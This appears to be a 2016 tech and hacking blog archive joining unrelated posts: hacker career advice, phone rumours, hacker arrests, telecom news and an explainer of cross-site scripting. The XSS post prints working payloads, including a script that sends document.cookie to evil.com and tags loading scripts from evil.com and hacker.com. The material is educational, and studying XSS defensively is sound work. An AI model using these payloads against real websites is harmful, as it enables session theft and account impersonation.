Friday, 9 September 2016

What skills do I need to learn to become a computer hacker?

If you don't have that passion for computers, you will never be a hacker. You can be a programmer, a computer scientist, world-famous in the IT field ... but not a hacker.

If you do have that passion, then it's possible ... but never easy. The following steps are for being a hacker on the software side ... these steps will be different for other endeavors.

Image result for hacker

* Learn about operating systems. Learn about operating systems you don't like. Learn about operating systems you would prefer to never use. Don't just concentrate on the fun stuff.
* Learn to program. Remember, programming is not language dependent. Don't worry about languages or programming style--yeah, you have to start with one programming language, but if you can learn to program in C, you can program in damn near anything. But avoid BASIC, if at all possible.
* Learn operations. Learn how networks work, how the processor works, jow memory works. You don't have to be a hardware guru (though if that's where your passion lies, go for it), but you do have to have at least some understanding of how the hardware works.
* Most important--NEVER STOP LEARNING! You will never learn everything about computer programming, not if you lived to be 1000 years old. You can learn from the crusty old Unix master who hasn't left his office in five years (because he doesn't have to), and you can learn from the shiny new wet-behind-the-ears intern who just hired on last week. The day you figure you have nothing left to learn, put down your keyboard and walk away, because your brain just stopped functioning.
The short answer is, all the skills required to do the task you want to do. For example, web application hacking? You will want to learn about the following topics:
  • Database architectures (i.e. different types of database engines)
  • SQL syntax (differences between MSSQL and MySQL, etc)
  • HTTP protocol (incl. how to send raw requests)
  • SSL/TLS issues and misconfigurations
  • Intercepting proxies (like Burp Suite and Owasp Zap)
  • Web application attacks (SQL Injection, RCE, RFI, LFI, XSS, CSRF, XST, etc. To learn about these attacks, check out the OWASP Testing Guide, it's free.)
  • How files and file permissions work on Windows and Linux
  • Being able to read and understand either ASP, ASP.NET, PHP or Java for source review purposes. (Can also be used to help developers create fixes to issues you've discovered. This skill is also required for e.g. code injection 0days you discover.)
  • Knowledge about web application scanners, their weaknesses and strengths, etc. (This skill is pretty easy to obtain, but is gained over time the more you use different scanners and learn which ones are generally the best for your projects. FYI actively scanning a web application without permission is generally illegal.)
  • Web services architecture
  • Web services vulnerabilities
Note: The list above is not exhaustive but does include the majority of information you will need to be able to hack a web application.


Turing’s 2018 phone to have three Snapdragon 830s, 18GB RAM, 1.2TB storage

Turing announces Monolith Chaconne with 3 Snapdragon 830s, 4K display, 18GB of RAM, and much more

Turing’s new smartphone to have 18GB of RAM, 1.2TB storage and three Snapdragon 830s

Turing Robotics Industries (TRI) with some more craziness after introducing the Turing Phone Cadenza last week. The company has just announced the Turing Monolith Chaconne, a smartphone with specs even stranger than its name, through an email newsletter.
The above announcement by TRI come two months after the firm finally managed to ship the pilot Turing Phone, a crowdfunded Android handset, to early backers, after much delay and some revisions.
Coming to Turing Monolith Chaconne, let’s have a look at its specifications at a glance:
• 3 Qualcomm Snapdragon 830 processor, 6.4-inch 4K display with 2160×3840 pixel resolution
• 18GB of LPDDR4X RAM (or 3 x 6GB memory chips)
• 1.2TB of storage (3 x 256GB memory, 512GB via microSD card)
• 60MP quad rear camera with Triplet Lens/T1.2 and iMAX 6K
• 20MP dual front camera
• Swordfish OS with deep learning (AI) features based on Sailfish OSS
• 120 Wh battery based on 3,600mAh Graphene Super-capacitor + 2,400mAh Li-Ion + Hydrogen Fuel Cell wordfish Sailfish OS
• WiGig support, Marshall audio, A.L.A.N
• Advanced AI Voice-Authenticated Power On/Off
• Four Nano-SIM support
• Graphene Oxide composite bodywork with Liquid Metal 2.0 Structural Frame, Lightweight Metal Outer Frame, High Temperature Alloy Components
• 4G + VoLTE, 3G, GSM
• Augmented Reality: Parallel Tracking & Mapping API
Steve Chao, CEO of TRI, in an email newsletter explains how it is going to connect the three Snapdragon 830 SoCs in the smartphone:
“TRI plans on connecting multiple CPUs via WiGig by implementing an ad-hoc driver to the 60GHz channel via on-board USB3.0. This complicated computing process stores a transient matrix in SSD of CPU(1), then it recomputes and shares the transient matrix with the other SSD of CPU(2) simultaneously. This results in the CPUs sharing their computing power in parallel. Such proprietary technology enables TRI to achieve never-seen-before computing power on a mobile device. So what exactly is this technology intended for? The answer is – Computational Intelligence (CI).”
The Turing Monolith Chaconne is expected to release in 2018. Whether or not will the company be able to launch this device next year and keep its promise, only time will tell. TRI also says that it will make its presence felt in Salo, Finland and start building prototypes for the Turing Phone Cadenza in a manufacturing facility right where Nokia and Microsoft used to produce their mobile phone prototypes.

Here are the 5 reasons why some Google employees live in parking lots


Image result for google employees living in parking lot

Google Inc. is the world’s largest search engine site that specializes in Internet-related services and products. Constantly ranked as the best company to work for, Google employees are among the highest-paid in the world.
“The benefits and care of employees is obviously world class, and compensation is almost unmatchable. But the company attracts some of the best talent and best people to work with in the world, which is the most important bit.” – Google Program Manager (San Francisco, CA).
To stay at the top, the company requires their employees to put in extra hours. As a result, you would reportedly find employees spending long hours at Google quite common. It turns that out some employees almost never leave the campus and start living in the parking lot!
There’s even a Quora thread about it. Here’s a look at 5 reasons Google employees prefer to live in parking lots and how easy it is…
Check out 5 reasons why some Google employees choose to live in parking lots

High rents

As the rent in South Bay area was too high, Ben Discoe decided to live at the Google campus, as he already had a house payment and alimony to pay. Hence, he stayed at the Google campus for a period of 13 months – October 2011 to November 2012. It turned out that living in a parking lot was more suitable.
When he started living on the campus, the security team at Google used to keep a watch on him. However, they left him alone once they were convinced that he was just an eccentric Googler.

To save money

Brandon Oxendine, a 23-year-old for the period June 28, 2013 to September 22, 2013 lived in a Google parking lot. He bought a station wagon, decorated it with two mattresses and put up curtains on the windows.
According to Oxendine’s blog, 20s for him is the time to save some money and reach financial freedom. Hence, he chose to live in the parking lot. “If I do plan on traveling the world, I’ll need to be comfortable with unconventional living situations, and this is certainly a good place to start,” he says.
Another Google employee, whose name was not cited in the Quora thread, stayed like a camper in the tent on campus. He saved up enough in 2-3 years to buy himself a house.

On a challenge

Matthew J Weaver started living in a Google parking lot on a challenge and says “it was excellent for my career.” According to Fox News report, although Google does not have a policy of permitting employees to sleep in campus, the security team “even kept a lookout on Weaver’s mobile home when he was away.”
When weather conditions were suitable, he would even hold parties in his RV on Thursdays wrote Weaver. However, he says that it was a little tough for him to provide explanation to women he was dating as to why he lived in a parking lot.

Could not find accommodation

One Googler could not find a place to stay who had shifted to the London office from the Mountain View headquarters.
He decided to stay at the office till a permanent residence could be organized. However, he slept under his desk for a duration of one week, instead of staying in the parking lot.

Not too difficult to stay

Living in a Google parking lot, or somewhere else for that matter, turns out is not really difficult.
Those employees who stayed at the campus for extended periods said that they showered at the gym and ate their meals at the office (Google provides free meals for all employees). Even laundry is not a problem, as employees can do their laundry on campus. Also, anytime you feel the need to use the restroom, “just walk the short distance to the nearest Google building and badge in,” writes Discoe.

Thursday, 8 September 2016

How to Hack Windows/Mac OS X Login Password (When Locked)



A Security researcher has discovered a unique attack method that can be used to steal credentials from a locked computer (but, logged-in) and works on both Windows as well as Mac OS X systems.

In his blog post published today, security expert Rob Fuller demonstrated and explained how to exploit a USB SoC-based device to turn it into a credential-sniffer that works even on a locked computer or laptop.

Fuller modified the firmware code of USB dongle in such a way that when it is plugged into an Ethernet adapter, the plug-and-play USB device installs and acts itself as the network gateway, DNS server, and Web Proxy Auto-discovery Protocol (WPAD) server for the victim's machine.
The attack is possible because most PCs automatically install Plug-and-Play USB devices, meaning "even if a system is locked out, the device [dongle] still gets installed," Fuller explains in his blog post.
"Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list."

How does the Attack Work?

You might be wondering: Why your computer automatically share Windows credentials with any connected device?

That is because of the default behavior of Microsoft Window’s name resolution services, which can be abused to steal authentication credentials.
The modified plug-and-play USB Ethernet adapter includes a piece of software, i.e. Responder, which spoofs the network to intercept hashed credentials and then stored them in an SQLite database.

The hashed credentials collected by the network exploitation tool can later be easily brute-forced to get clear text passwords.

Apparently, to conduct this attack, attackers would require physical access to a target computer, so that they can plug in the evil USB Ethernet adapter. However, Fuller says the average time required for a successful attack is just 13 seconds.

You can watch the video demonstration below that shows Fuller's attack in action.




Fuller successfully tested his attack against Windows 98 SE, Windows 2000 SP4, Windows XP SP3, Windows 7 SP1, Windows 10 Enterprise and Home (but not Windows 8), as well as OS X El Capitan and OS X Mavericks. He’s also planning to test it against several Linux distros.

Fuller tested the attack with two USB Ethernet dongles: the USB Armory and the Hak5 Turtle. For more detailed explanation, you can head on to his blog post.





Two Hackers who hacked US Spy Chief, Arrested by FBI


US authorities have arrested two North Carolina men on charges that they were part of the notorious hacking group "Crackas With Attitude."
Crackas with Attitude is the group of hackers who allegedly was behind a series of audacious and embarrassing hacks that targeted personal email accounts of senior officials at the CIA, FBI, the White House, Homeland Security Department, and other US federal agencies.

Andrew Otto Boggs, 22, of North Wilkesboro, N.C., who allegedly used the handle "INCURSIO," and Justin Gray Liverman, 24, of Morehead City, who known online as "D3F4ULT," were arrested on Thursday morning on charges related to their alleged roles in the computer hacking, according to a press release by Department of Justice.
A 16-year-old British teenager suspected of being part of the group was arrested in February by the FBI and British police.

Although court documents did not name the victims, the hacking group had allegedly:
  • Hacked into the AOL email of CIA director John Brennan and released personal details.
  • Hacked into the personal emails and phone accounts of the US spy chief James Clapper.
  • Broke into the AOL email of the FBI Deputy Director Mark Giuliano.
Cracka also leaked the personal details of 31,000 government agents belonging to nearly 20,000 FBI agents; 9,000 Department of Homeland Security (DHS) officers and some number of DoJ staffers.
"In some instances, members of the conspiracy uploaded private information that they obtained from victims’ personal accounts to public websites; made harassing phone calls to victims and their families; and defaced victims’ social media accounts," reads the press release.

According to the FBI officials, between October 2015 to February 2016, the hacking group used social engineering in order to trick the victims into revealing their account number, password, and other details.

Boggs and Liverman will be extradited next week to the Eastern District of Virginia, where federal prosecutors have spent months building a case against Crackas With Attitude.

Robotics: Remote control Car at Niks Technology

A Robotics Project by Niks Technology. A remote control car having great features. Have a look! The most amazing part is.... It costs less than 250-300 INR.





This Remote control Car is made at Niks Technology, this car is having many features like it can rotate at 0 degree and many more. And Yes! It costs only 250-300 INR.

Remote controlled toys are any type of toy that can be controlled remotely.


There are four components of a remote controlled vehicle. The first component is the transmitter, which is the controller that the user has in their hand. This controller sends a signal, such as a radio wave, to the car. The receiver, such as an antenna and circuit board, sits inside of the toy and it takes the signal from the transmitter. When the receiver gets the signal, it activates motors inside the toy depending on the signal that the transmitter gives out. The motors inside of the toy are what allow the toy to be steered, to turn wheels, operate propellers, and do various other tasks. The final component of a remote controlled toy is the power source, which is usually a battery that is placed inside of the transmitter.

Tuesday, 6 September 2016

20 Things You Didn't Know About... Computer Hacking

What's the connection between Steve Wozniak, the Pope, and Henry Kissinger? That's right, it's hacking.

1  Hacker originally meant “one who makes furniture with an ax.” Perhaps because of the blunt nature of that approach, the word came to mean someone who takes pleasure in an unconventional solution to a technical obstacle.
2  Computer hacking was born in the late 1950s, when members of MIT’s Tech Model Railroad Club, obsessed with electric switching, began preparing punch cards to control an IBM 704 mainframe.
3  One of the club’s early programs: code that illuminated lights on the mainframe’s console, making it look like a ball was zipping from left to right, then right to left with the flip of a switch. Voilà: computer Ping-Pong!
4  By the early 1970s, hacker “Cap’n Crunch” (a.k.a. John Draper) had used a toy whistle to match the 2,600-hertz tone used by AT&T’s long-distance switching system. This gave him access to call routing (and brief access to jail).
5  Before they struck it rich, Apple founders Steve Wozniak and Steve Jobs made and sold “blue boxes,” electronic versions of Draper’s whistle.
6  Using a blue box, Wozniak crank-called the Pope’s residence in Vatican City and pretended to be Henry Kissinger.
7  Hacking went Hollywood in the 1983 movie WarGames, about a whiz kid who breaks into a Defense Department computer and, at one point, hi­jacks a pay phone by hot-wiring it with a soda can pull-ring.
8  That same year, six Milwaukee teens hacked into Los Alamos National Lab, which develops nuclear weapons.
9  In 1988 Robert T. Morris created a worm, or self-replicating program, purportedly to evaluate Internet security.
10  The worm reproduced too well, however. The multi­million-dollar havoc that ensued led to Morris’s felony conviction, one of the first under the Computer Fraud and Abuse Act (PDF).
11  They all come home eventually. Morris now researches computer scienceat...MIT.
12  British hacker Gary McKinnon broke into 97 U.S. Navy, Army, Pentagon, and NASA computers in 2001 and 2002.
13  McKinnon’s defense: He wasn’t hunting military secrets; he was only seeking suppressed government files about space aliens.
14  According to rumor, agents of China’s People’s Liberation Army attempted to hack the U.S. power grid, triggering the great North American blackout of 2003.
15  It took IBM researcher Scott Lunsford just one day to penetrate the network of a nuclear power station: “I thought, ‘Gosh, this is a big problem.’”
16  Unclear on the concept: When West Point holds its annual cyberwar games, the troops wear full fatigues while fighting an enemy online.
17  Think your Mac is hackproof? At this year’s CanSecWest conference, security researcher Charlie Miller used a flaw in Safari to break into a MacBook in under 10 seconds.
18  Cyborgs beware: Tadayoshi Kohno at the University of Washington recently hacked into a wireless defibrillator, causing it to deliver fatal-strength jolts of electricity.
19  This does not bode well for patients receiving wireless deep-brain stimulators.
20  The greatest kludge of all? Roger Angel of the University of Arizona has proposed building a giant sunscreen in space to hack the planet’s climate.

What happens to S Tel Telecom Ltd. India? 32 GB 3G at 32 RS.



S Tel Private Limited was a GSM based cellular operator in India. It had unified access service licenses to operate in the circles of Orissa, Bihar, Himachal Pradesh, North East, Assam and Jammu & Kashmir. It was owned jointly by C Sivasankaran (51%) and Bahrain Telecommunications (49%).
On 2 February 2012 Supreme Court of India quashed all 122 spectrum licences granted during the tenure of former communications minister A Raja. Six licences of S Tel were cancelled, and Batelco sold its share of S Tel. Batelco was the first foreign operator to cease operations in India following the 2G spectrum scam. The sale was to be completed by the end of October 2012.
At its peak, S Tel had operations in 5 Category C circles – Orissa, Bihar, Himachal Pradesh, North East and Assam. The company was also in the process of launching its services in the northernmost circle of Jammu & Kashmir. These licenses enabled the company to provide Unified Mobile service, wireless broadband and innovative Value Added Services (VAS) covering a population of over 226 million across these circles. S Tel had approximately 3.6 million subscribers as of February 2012 just before the cancellation of its licenses and subsequent closure of its entire business.


S Tel Mobile Service Goes Down In Various Part of India, Customers Irked

After Cheers Mobile (Etisalat DB) Outage its now the turn of another small GSM operator – S Tel which is down in Orissa, Bihar-Jharkhand and in other circles from last  12 days.
We were getting constant complaints from STel subscribers in Orissa and Jharkhand and one of reader Sonu alerted us regarding the same.
Same as Cheers Mobile, STel has passive infrastructure sharing agreement with Reliance Communications for the 4 telecom circles, and according to our exclusive sources Rcom has disconnected the service of STel from more than 700 BTS (Mobile Tower) across 4 circles.
While contacting the customer care officials of STel (Orissa) we have been told that the network problem which the Customers are facing now is a temporary one, and we are expecting the same to get resolved soon.
We have also been told that the experts are working 24 hours to restore the network which is taking slight more time than the expected one assuring that, we are putting all possible effort to restore the network as soon as possible.
This is very surprising to see Operators like S Tel who dint even come forward to alert its customer even after more than 12 days of downtime where as in case of Cheers Mobile the very next day they altered the customers and apologized for the inconvenience.
We hope at least after reading this S Tel officials will come forward and alert the customers and public what is happening and when things would be fixed.

What Happens to 3G Spectrum in 3 Circles Alloted to S-Tel?

Amidst of all telecom related mess up, it seems everyone is so concerned about 2G spectrum – its policy, allocation, reserve price and all these. But the whole thing is so messed up, considering 2G spectrum is mainly for voice, which is in turn as bread and butter for consumers and operators.
But Govt. is not doing anything to get back the 3G spectrum from STel, one of the operators whose licenses were cancelled by court order in February 2012. During that time STel was operating in 5 circles – Himachal Pradesh, Assam, Orissa, Bihar – Jharkhand and North East and offering 2G/GSM voice and data services.
In 2008 STel got spectrum and UASL in 6 category ‘C’ circles including Jammu and Kashmir. As in February 2012 the operator’s licence was cancelled, its foreign invester BaTelco (Currently BaTelco is looking for a come back in India, via Reliance Communications’s Globalcom) sold its entire stake to Indian partner Sky City Foundation. Siva Group, headed by Sivasankaran has the majority stake in STel. STel also won 5MHz 3G spectrum on 2100 MHz band in Orissa, Himachal Pradesh and Bihar in a valid auction process in 2010; the ownership of those 3G airwave still belong to STel. The company did not roll out 3G services in none of the circles, while its website reads that STel’s network is a 3G-ready network.
At present Stel website (Stel.in) is still alive and offers MNP procedure. Shiva Group’s website also notes for STel as the company’s telecom project and writes that STel owns the 3G spectrum while 2G licences were cancelled. Just after the cancellation of its licenses the company wrote to Prime Minister they will refund the spectrums if Govt. agrees to refund their money wasted for acquiring 2G and 3G spectrum with interests. STel does not seem in a position or desire to start its business again in India, as the company did not participate in any of the 2G auction process lately (Nov 2012 and March 2013).
So the solution is simple, take back the spectrum on 2100MHz from STel and refund the money they paid during 2010 3G auction along with interest, and conduct a small 3G spectrum auction for these three circles. Though I doubt anyone can invest for 3G in those category ‘C’ circles except Telenor who are still giving priority to voice markets.
But is there any movement from Govt to get back STel’s 3G spectrum? No. Nobody knows why. Keeping 3G spectrum unused, it’s no good.

Sunday, 4 September 2016

Where to Learn SQL injection? | Learn SQL injection easily

First of all let me tell you about SQL injection. According to Wikipedia :-
SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
In a 2012 study, it was observed that the average web application received 4 attack campaigns per month, and retailers received twice as many attacks as other industries.
You can easily learn SQL injection online or offline any mode. There is not a single difference b/w these two modes. For example if you choose to learn online then you can learn at W3Schools.
And if you opt out for Offline mode then it's so easy for you. You can even interact with your teachers for better understanding.
Yes, of course i am a learner now and even i am learning SQL injection! I think some of you people want to know from where am i learning?
"I am learning online, from various video tutorials!"
 So i think now you people got the answer of the question that "Where to Learn SQL Injection?"

Saturday, 3 September 2016

XSS Cross Site Scripting Attack

Cross-site Scripting (XSS) Attack

Source :- Acunetix
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a vulnerability within a website or web application that the victim would visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.
While XSS can be taken advantage of within VBScript, ActiveX and Flash (although now considered legacy or even obsolete), unquestionably, the most widely abused is JavaScript – primarily because JavaScript is fundamental to most browsing experiences.

How Cross-site Scripting works

In order to run malicious JavaScript code in a victim’s browser, an attacker must first find a way to inject a payload into a web page that the victim visits. Of course, an attacker could use social engineering techniques to convince a user to visit a vulnerable page with an injected JavaScript payload.
In order for an XSS attack to take place the vulnerable website needs to directly include user input in its pages. An attacker can then insert a string that will be used within the web page and treated as code by the victim’s browser.
The following server-side pseudo-code is used to display the most recent comment on a web page.
print "<html>"
print "<h1>Most recent comment</h1>"
print database.latestComment
print "</html>"
The above script is simply printing out the latest comment from a comments database and printing the contents out to an HTML page, assuming that the comment printed out only consists of text.
The above page is vulnerable to XSS because an attacker could submit a comment that contains a malicious payload such as <script>doSomethingEvil();</script>.
Users visiting the web page will get served the following HTML page.
<html>
<h1>Most recent comment</h1>
<script>doSomethingEvil();</script>
</html>
When the page loads in the victim’s browser, the attacker’s malicious script will execute, most often without the user realizing or being able to prevent such an attack.

What’s the worst an attacker can do with JavaScript?

The consequences of what an attacker can do with the ability to execute JavaScript on a web page may not immediately stand out, especially since browsers run JavaScript in a very tightly controlled environment and that JavaScript has limited access to the user’s operating system and the user’s files.
However, when considering that JavaScript has access to the following, it’s easier to understand how creative attackers can get with JavaScript.
  • Malicious JavaScript has access to all the same objects the rest of the web page has, including access to cookies. Cookies are often used to store session tokens, if an attacker can obtain a user’s session cookie, they can impersonate that user.
  • JavaScript can read and make arbitrary modifications to the browser’s DOM (within the page that JavaScript is running).
  • JavaScript can use XMLHttpRequest to send HTTP requests with arbitrary content to arbitrary destinations.
  • JavaScript in modern browsers can leverage HTML5 APIs such as accessing a user’s geolocation, webcam, microphone and even the specific files from the user’s file system. While most of these APIs require user opt-in, XSS in conjunction with some clever social engineering can bring an attacker a long way.
The above, in combination with social engineering, allow attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. Critically, XSS vulnerabilities provide the perfect ground for attackers to escalate attacks to more serious ones.

“Isn’t Cross-site scripting the user’s problem?”

If an attacker can abuse a XSS vulnerability on a web page to execute arbitrary JavaScript in a visitor’s browser, the security of that website or web application and its users has been compromised — XSS is not the user’s problem, like any other security vulnerability, if it’s affecting your users, it will affect you.

The anatomy of a Cross-site Scripting attack

An XSS attack needs three actors — the websitethe victim and the attacker.
In the example below, it shall be assumed that the attacker’s goal is to impersonate the victim by stealing the victim’s cookie. Sending the cookie to a server the attacker controls can be achieved in a variety of ways, one of which is for the attacker to execute the following JavaScript code in the victim’s browser through an XSS vulnerability.
<script>
   window.location=“http://evil.com/?cookie=” + document.cookie
</script>
The figure below illustrates a step-by-step walkthrough of a simple XSS attack.
A typical example of how XSS works
  1. The attacker injects a payload in the website’s database by submitting a vulnerable form with some malicious JavaScript
  2. The victim requests the web page from the website
  3. The website serves the victim’s browser the page with the attacker’s payload as part of the HTML body.
  4. The victim’s browser will execute the malicious script inside the HTML body. In this case it would send the victim’s cookie to the attacker’s server. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives to the server, after which the attacker can use the victim’s stolen cookie for impersonation.

Some examples of Cross-site Scripting attack vectors

The following is a non-exhaustive list of XSS attack vectors that an attacker could use to compromise the security of a website or web application through an XSS attack. A more extensive list of XSS payload examples is maintainedhere.

<script> tag

The <script> tag is the most straight-forward XSS payload. A script tag can either reference external JavaScript code, or embed the code within the script tag.

<!-- External script -->
<script src=http://evil.com/xss.js></script>
<!-- Embedded script -->
<script> alert("XSS"); </script>

<body> tag

An XSS payload can be delivered inside <body> tag by using the onload attribute or other more obscure attributes such as the background attribute.
<!-- onload attribute -->
<body onload=alert("XSS")>
<!-- background attribute -->
<body background="javascript:alert("XSS")">

<img> tag

Some browsers will execute JavaScript when found in the <img>.
<!-- <img> tag XSS -->
<img src="javascript:alert("XSS");">
<!--  tag XSS using lesser-known attributes -->
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">

<iframe> tag

The <iframe> tag allows the embedding of another HTML page into the parent page. An IFrame can contain JavaScript, however, it’s important to note that the JavaScript in the iFrame does not have access to the DOM of the parent’s page do to the browser’s Content Security Policy (CSP). However, IFrames are still very effective means of pulling off phising attacks.
<!-- <iframe> tag XSS -->
<iframe src=”http://evil.com/xss.html”>

<input> tag

In some browsers, if the type attribute of the <input> tag is set to image, it can be manipulated to embed a script.
<!-- <input> tag XSS -->
<input type="image" src="javascript:alert('XSS');">

<link> tag

The <link> tag, which is often used to link to external style sheets could contain a script.
<!-- <link> tag XSS -->
<link rel="stylesheet" href="javascript:alert('XSS');">

<table> tag

The background attribute of the table and td tags can be exploited to refer to a script instead of an image.
<!-- <table> tag XSS -->
<table background="javascript:alert('XSS')">
<!-- <td> tag XSS -->
<td background="javascript:alert('XSS')">

<div> tag

The <div> tag, similar to the <table> and <td> tags can also specify a background and therefore embed a script.
<!-- <div> tag XSS -->
<div style="background-image: url(javascript:alert('XSS'))">
<!-- <div> tag XSS -->
<div style="width: expression(alert('XSS'));">

<object> tag

The <object> tag can be used to include in a script from an external site.
<!-- <object> tag XSS -->
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">